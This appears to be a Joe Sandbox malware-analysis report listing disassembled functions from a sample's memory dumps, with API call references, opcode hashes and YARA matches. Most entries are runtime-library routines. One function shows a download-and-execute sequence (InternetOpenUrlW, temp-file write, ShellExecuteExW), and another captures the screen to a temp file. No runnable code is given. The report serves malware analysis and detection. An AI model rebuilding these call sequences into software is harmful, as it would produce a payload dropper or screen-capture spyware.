                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                                      • Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C
                                                                                                                                                                                                                                                                                      Function 00A398BB Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3895623378.0000000000A39000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A39000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_a39000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                                      • Instruction ID: 399bbc4224340bdeb23cc5c4eebcec2e621cc9384e450b9884e0b7d8fad6452b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95114C72740104AFDB44DE55DC81FA773AAEB89320B298059F908CB316E6B5E801C760
                                                                                                                                                                                                                                                                                      Function 024C0D90 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                                      • Instruction ID: 282f36453e78a46ab25232ea44878a20f757f6c52a57e84fc00a9fc6754f5c84
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F01F77A610600CFDF61CF28C904BAB33E9EB85205F1550AAD50697341E370A8418B90
                                                                                                                                                                                                                                                                                      Function 004020FA Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040214A
                                                                                                                                                                                                                                                                                      • GetDC.USER32(?), ref: 00402151
                                                                                                                                                                                                                                                                                      • CreateSolidBrush.GDI32(00646464), ref: 00402164
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00402178
                                                                                                                                                                                                                                                                                      • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00402191
                                                                                                                                                                                                                                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
                                                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
                                                                                                                                                                                                                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004021EA
                                                                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00402267
                                                                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00402276
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0040227F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                                                                                                                                                                                                                                                      • String ID: Tahoma
                                                                                                                                                                                                                                                                                      • API String ID: 3832963559-3580928618
                                                                                                                                                                                                                                                                                      • Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                                                                                                                                                                                                                                      • Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14
                                                                                                                                                                                                                                                                                      Function 00402571 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 004025CD
                                                                                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
                                                                                                                                                                                                                                                                                      • ReleaseCapture.USER32 ref: 004025F2
                                                                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00402619
                                                                                                                                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
                                                                                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 004026A9
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004026B3
                                                                                                                                                                                                                                                                                      • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 004026EA
                                                                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
                                                                                                                                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00402731
                                                                                                                                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00402738
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0040273F
                                                                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 0040274D
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00402754
                                                                                                                                                                                                                                                                                      • SetCapture.USER32(?), ref: 004027A1
                                                                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 004027D5
                                                                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 004027EB
                                                                                                                                                                                                                                                                                      • GetKeyState.USER32(0000001B), ref: 004027F8
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 0040280D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                                                                                                                                                                                                                                                      • String ID: gya
                                                                                                                                                                                                                                                                                      • API String ID: 2545303185-1989253062
                                                                                                                                                                                                                                                                                      • Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                                                                                                                                                                                                      • Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C
                                                                                                                                                                                                                                                                                      Function 024EE919 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$Info
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2509303402-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                                                                                      • Instruction ID: ccde6b9d5692c033315b5ab6a8c795f841b83a804b2d9581facbe1bf21578853
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02B1AD71A002499FEF21DF69C880BAFBBF5BF48314F14416EE59AA7341DB75A8418B20
                                                                                                                                                                                                                                                                                      Function 0042E6B2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$Info
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2509303402-0
                                                                                                                                                                                                                                                                                      • Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                                                                                                                                                                                                      • Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24
                                                                                                                                                                                                                                                                                      Function 024FA85F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 024FA8A3
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C0F
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C21
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C33
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C45
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C57
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C69
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C7B
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C8D
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C9F
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9CB1
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9CC3
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9CD5
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9CE7
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA898
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F36D1: HeapFree.KERNEL32(00000000,00000000,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?), ref: 024F36E7
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F36D1: GetLastError.KERNEL32(?,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?,?), ref: 024F36F9
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA8BA
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA8CF
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA8DA
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA8FC
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA90F
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA91D
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA928
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA960
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA967
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA984
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA99C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                                                      • Instruction ID: e2f8de537a3546ced4701bae047de9727c572679c1f75b14ebf35eb39c9f07e9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38319C316002119FEBB0AF7AD880B5BBBE9AF80350F11486FEA49D7750DBB0A850CA14
                                                                                                                                                                                                                                                                                      Function 0043A5F8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 0043A63C
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A631
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A653
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A668
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A673
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A695
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A6A8
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A6B6
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A6C1
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A6F9
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A700
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A71D
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A735
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                                                      • Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A
                                                                                                                                                                                                                                                                                      Function 00439A89 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                                                                                                                                                                                                      • Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54
                                                                                                                                                                                                                                                                                      Function 024C2C5B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134filenetworksynchronizationCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 024C2C7E
                                                                                                                                                                                                                                                                                      • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 024C2C94
                                                                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000105,?), ref: 024C2CB0
                                                                                                                                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 024C2CC6
                                                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 024C2CFF
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 024C2D3B
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 024C2D58
                                                                                                                                                                                                                                                                                      • ShellExecuteExW.SHELL32(?), ref: 024C2DCF
                                                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00008000), ref: 024C2DE4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                                                                                                                                                                                                      • String ID: <
                                                                                                                                                                                                                                                                                      • API String ID: 838076374-4251816714
                                                                                                                                                                                                                                                                                      • Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                                                                                                                                                                                                                                      • Instruction ID: aa654bc57c3ad7445d99552aaf86822b21a08c106210855fbb8089566405b2b8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 394160B590021DAEEB20DF649C85FEA77BCFF15705F1080EAA545A2150DFB09E858FA4
                                                                                                                                                                                                                                                                                      Function 024DEEC2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,024DF228,00000004,024D7D87,00000004,024D8069), ref: 024DEEF9
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,024DF228,00000004,024D7D87,00000004,024D8069,?,024D8799,?,00000008,024D800D,00000000,?,?,00000000,?), ref: 024DEF05
                                                                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(advapi32.dll,?,024DF228,00000004,024D7D87,00000004,024D8069,?,024D8799,?,00000008,024D800D,00000000,?,?,00000000), ref: 024DEF15
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00447430), ref: 024DEF2B
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF41
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF58
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF6F
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF86
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF9D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                      • String ID: advapi32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                                                                                      • Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                                                                                                                                                                                                                                      • Instruction ID: 9c71dfb5babe54993bf6a7492855afb1ee1096368b068bb90988fde5d929ad68
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68218EB1908711BFE7106FB49C0CA5ABFA8EF05B16F004A2BF555E7601CBBC94418FA8
                                                                                                                                                                                                                                                                                      Function 024DEEC5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,024DF228,00000004,024D7D87,00000004,024D8069), ref: 024DEEF9
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,024DF228,00000004,024D7D87,00000004,024D8069,?,024D8799,?,00000008,024D800D,00000000,?,?,00000000,?), ref: 024DEF05
                                                                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(advapi32.dll,?,024DF228,00000004,024D7D87,00000004,024D8069,?,024D8799,?,00000008,024D800D,00000000,?,?,00000000), ref: 024DEF15
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00447430), ref: 024DEF2B
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF41
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF58
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF6F
